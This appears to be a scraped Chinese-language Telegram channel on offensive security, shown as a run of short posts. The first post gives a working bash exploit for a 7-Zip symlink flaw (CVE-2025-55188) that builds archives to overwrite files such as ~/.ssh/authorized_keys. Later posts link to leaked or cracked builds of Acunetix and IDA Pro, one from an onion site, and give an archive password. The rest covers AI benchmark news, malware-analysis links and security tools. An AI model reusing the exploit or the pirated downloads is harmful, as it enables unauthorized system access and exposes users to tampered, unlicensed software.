Вже доступно! Дослідження Telegram за 2025 — головні інсайти року 
信息安全渗透攻防漏洞分享
Відкрити в Telegram
947
Підписники
+224 години
+137 днів
+2330 день
Архів дописів
947
#漏洞利用 #winrar #CVE-2025-55188 #7-zip
符号链接任意文件符号链接任意文件
7-Zip至25.01。
该漏洞是由于7-Zip在提取过程中不正确地处理SIM链接,从而允许创建的存档覆盖系统中的文件而导致的。
#!/bin/bash
if [ "$#" -ne 3 ]; then
echo "Usage: $0 <payload_file> <target_symlink_path> <output_archive>"
echo "Example: $0 mykey.pub ../../.ssh/authorized_keys exploit.7z"
exit 1
fi
PAYLOAD="$1"
TARGET="$2"
OUT="$3"
WORKDIR=$(mktemp -d)
ln -s "$TARGET" "$WORKDIR/symlink"
cp "$PAYLOAD" "$WORKDIR/symlink"
tar --sort=name -cf "$WORKDIR/exploit.tar" -C "$WORKDIR" symlink
7z a "$OUT" "$WORKDIR/exploit.tar" >/dev/null
echo "[*] Exploit archive created: $OUT"
rm -rf "$WORKDIR"947
#AI #openai #人工智能
GPT-5发布才几天,就被曝出在编程能力测试中“动了手脚”。有开发者发现,OpenAI号称用SWE-bench Verified基准评测,实际只用了477道题,把原本的500题悄悄删掉了23道。要是把这23道题算成零分,GPT-5的得分可能还不如Claude Opus 4.1——而且两者的差距本来也就0.4%,几乎是贴身肉搏。
这事让不少人笑了出来:“不会的题就删掉”、“会的都会了,不会的做了也没用”——这理由要是放在考试里,估计直接被监考老师请出去了。有人甚至调侃OpenAI学上了华为那一套“内部成绩优化”,还有人感叹,这种小动作反而会影响外界对评测的信任。
补充一下,closeai 以前也是只用477个,并不是专为 GPT5。
发布 o1 的时候是怎么解释的:
“GPT-4o numbers are from the SWE-bench Verified blog post on the full 500 subset. Due to systems issues,
other models are evaluated on an n=477 subset.”
来源:
https://x.com/deedydas/status/1953855509078872202?t=X9HyEXIP-t1A-dA08KvO_g&s=19
https://cdn.openai.com/o1-system-card.pdf
947
#恶意软件分析
1. DarkCloud 窃取工具
https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain
2. SoupDealer - 隐形 Java 加载器
https://www.malwation.com/blog/technical-analysis-of-a-stealth-java-loader-used-in-phishing-campaigns-targeting-turkiye
3. PyLangGhost 远控木马
https://any.run/cybersecurity-blog/pylangghost-malware-analysis
4. Efimer 木马
https://securelist.com/efimer-trojan/117148
5. CastleBot 恶意软件即服务
https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation
947
#AI #人工智能 #漏洞挖掘 #网络安全 #漏洞响应 #白帽黑客 #演讲 #奇安信 #补天 #技术分享
围绕如何利用人工智能技术来辅助安全研究人员进行漏洞挖掘和分析,从而提升漏洞响应的效率和准确性。这份文档对于对AI在网络安全领域的应用、漏洞挖掘技术以及安全研究感兴趣的专业人士和爱好者来说,具有重要的参考价值。
947
#BugBounty #渗透测试 #网络安全 #漏洞挖掘 #白帽黑客 #信息安全 #网络攻防 #安全测试 #漏洞赏金 #安全研究
CN:《Bug Bounty from Scratch》是一部全面介绍漏洞赏金(Bug Bounty)从入门到进阶的实战指南,涵盖了漏洞赏金平台运作机制、常见漏洞类型、安全测试方法、工具使用、报告撰写技巧以及与安全团队沟通的最佳实践。作者结合多年国际红队与渗透测试经验,通过真实案例与技巧分享,帮助读者快速掌握从信息收集到漏洞利用再到报告提交的完整流程,适合网络安全爱好者、渗透测试工程师及白帽黑客阅读。
EN:Bug Bounty from Scratch is a comprehensive practical guide for learning bug bounty hunting from the ground up, covering how bug bounty platforms work, common vulnerabilities, penetration testing methodologies, essential tools, vulnerability reporting, and effective communication with security teams. Written by an experienced red team leader and penetration tester, the book provides real-world examples, advanced techniques, and best practices to help readers develop the skills needed to find and responsibly disclose security flaws. Perfect for cybersecurity enthusiasts, pentesters, and ethical hackers.
947
#AI #人工智能 #漏洞挖掘 #网络安全 #漏洞响应 #白帽黑客 #演讲 #奇安信 #补天 #技术分享
奇安信旗下的补天漏洞响应平台在W22天白帽黑客城市沙龙(杭州站)上的一次演讲材料。文章围绕如何利用人工智能技术来辅助安全研究人员进行漏洞挖掘和分析,从而提升漏洞响应的效率和准确性。这份文档对于对AI在网络安全领域的应用、漏洞挖掘技术以及安全研究感兴趣的专业人士和爱好者来说,具有重要的参考价值。
947
#工具 #AppSec
通过静态类型阻止反序列化攻击
https://github.com/columbia/quack
// 通过修复反序列化 API 调用来自动保护应用程序的框架
947
Repost from CyberSecurityTechnologies
#tools
#AppSec
Black Hat USA 2025:
"QUACK: Hindering Deserialization Attacks via Static Duck Typing", 2025.
]-> https://github.com/columbia/quack
// framework for automatically protecting applications by fixing calls to deserialization APIs
947
#红队战术
#蓝队技术
#紫队练习
2025年美国黑帽大会:
“我现在就在你的日志里,欺骗你的分析师,蒙蔽你的EDR”。
全面的ETW事件生成工具
https://github.com/olafhartong/BamboozlEDR
947
#Acunetix #渗透测试工具 #Web漏洞扫描 #安全工具分享 #网络安全 #Windows工具
Acunetix v25.5.250613157 - 17 Jun 2025
Windows: https://pwn3rzs.co/scanner_web/acunetix/Acunetix-v25.5.250613157-Windows-Pwn3rzs-CyberArsenal.rar
Linux: [No installer leaked, yet]
Password: Pwn3rzs
Changelog:
Too long for a post, refer here:
https://www.acunetix.com/changelogs/acunetix-premium/v25-5-0-17-june-2025/
947
IDA Pro 9.2 Beta 2 Windows
source: http://xjepeflts2qwhqb77bw5vj6xguve56rpyeoxibztd7t7fehxxowt5fad.onion/9.2/, https://bbs.kanxue.com/thread-287796.htm, https://www.52pojie.cn/thread-2049414-1-1.html
$ sha256sum *
894fca47a5f0f9f7a0790013073dbaf38a50540ae9c336533f3ebb5a0bf27280 ida-pro_92_x64win.exe